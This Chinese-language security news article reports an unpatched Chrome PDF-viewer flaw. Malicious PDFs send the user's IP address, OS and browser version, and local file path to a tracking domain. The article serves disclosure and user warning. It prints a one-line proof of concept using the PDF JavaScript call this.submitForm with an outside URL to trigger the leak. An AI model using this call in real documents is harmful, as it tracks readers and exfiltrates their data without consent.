Chrome 0day漏洞：不要用Chrome查看pdf文件

研究人員發現一起利用Chrome 0day漏洞的惡意PDF樣本，當用Google Chrome打開PDF 0day樣本時就可以追蹤用戶/收集用戶數據。

概述

從2018年12月起，EdgeSpot研究人員檢測到利用Google Chrome 0 day漏洞的多個PDF樣本。攻擊者利用該漏洞可以在用戶用Chrome作為本地PDF閱讀器時，讓PDF文件的發送方來追蹤用戶和收集用戶的部分信息。

技術細節

從去年12月開始，研究人員陸續發現一些惡意PDF樣本。這些樣本在主流的Adobe Reader中打開是沒有問題的，但是當用本地Google Chrome打開後會產生一些可疑的流量。

本文分析的樣本是：

https://www.virustotal.com/#/file/2dd6ade4d0d4dc8224b28f8819b1c49bb7ae4025933e737ac8069c496d88bb43/detection (最早提交日期為2017-10-01，文件名: 「honduras-bginfo.pdf」)

EdgeSpot的安全引擎將該惡意樣本標記為POTENTIAL ZERO-DAY ATTACK (Google Chrome), PERSONAL INFORMATION LEAKAGE，如下圖所示：

https://edgespot.io/analysis/2dd6ade4d0d4dc8224b28f8819b1c49bb7ae4025933e737ac8069c496d88bb43/

當樣本在本地Google Chrome中打開後，內容如下圖所示：

通過在後台抓取流量，研究人員發現了一些數據在沒有用戶交互的情況下被發送給域名readnotify.com，也就是說這些數據在沒有用戶授權的情況下被竊取了。

流量是一個HTTP POST包，如下圖所示：

用戶查看PDF文件時，該PDF實際上是在與C2伺服器進行通信。

根據HTTP包的信息，被收集和發送的用戶信息包括：

·用戶的公網IP地址

·OS和Chrome版本等

·PDF文件在用戶電腦中的完整路徑

近期，研究人員又發現一些更多的惡意PDF樣本，包括2018年11月發現的和最近@insertScript發現的。與之前樣本不同的是，新樣本：

·影響的是Google Chrome（作為本地PDF閱讀器），而不是Adobe Reader。

·不允許竊取NTLM，但是會泄露操作系統信息和文件保存的路徑。

研究人員分析樣本發現在stream-1中有可疑的JS代碼。

反混淆代碼後，研究人員發現根源在於"this.submitForm()" PDF Javascript API。

研究人員開發了一個PoC，像this.submitForm("http://google.com/test")這樣的一個簡單的API調用就會使Google Chrome發送個人信息到google.com。

研究人員已經與Google取得聯繫，確認了0 day漏洞的詳細情況，Chrome團隊稱該漏洞會在4月底進行更新和修復。

研究人員建議相關用戶在Chrome修復該漏洞前不要使用Chrome查看本地PDF文件，如果只能使用Chrome，那麼查看的時候可疑斷開網路連接。

註：edgespot稱發文後引起了一些誤解，目前已經將原文中的0 day漏洞表述修改為未修復漏洞。

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！